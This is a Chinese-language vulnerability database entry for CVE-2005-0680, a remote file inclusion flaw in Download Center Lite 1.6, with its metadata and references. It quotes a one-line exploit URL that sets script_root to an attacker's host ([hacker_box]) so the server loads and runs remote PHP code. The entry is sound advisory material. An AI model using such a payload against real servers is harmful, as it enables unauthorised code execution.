Download Center Lite 'download_center_lite.inc.php'远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108517 漏洞类型 未知
发布时间 2005-03-10 更新时间 2006-09-28
CVE编号 CVE-2005-0680 CNNVD-ID CNNVD-200503-067
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/870
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-067
|漏洞详情
DownloadCenterLite1.6的download_center_lite.inc.php中存在PHP远程文件包含漏洞,远程攻击者可以通过修改script_root参数来引用含有该代码的远程Web服务器的URL,从而执行任意PHP代码。
|漏洞EXP
Example:

  if register_globals=on and allow_url_fopen=on:
    http://[victim]/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker_box]/

# milw0rm.com [2005-03-10]
|参考资料

来源:www.stadtaus.com
链接:http://www.stadtaus.com/forum/t-1579.html
来源:SECUNIA
名称:14513
链接:http://secunia.com/advisories/14513
来源:BUGTRAQ
名称:20050304DownloadCenterLite(DCL)-ArbitraryFileInclusion(VXSfx)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110996056601719&w=2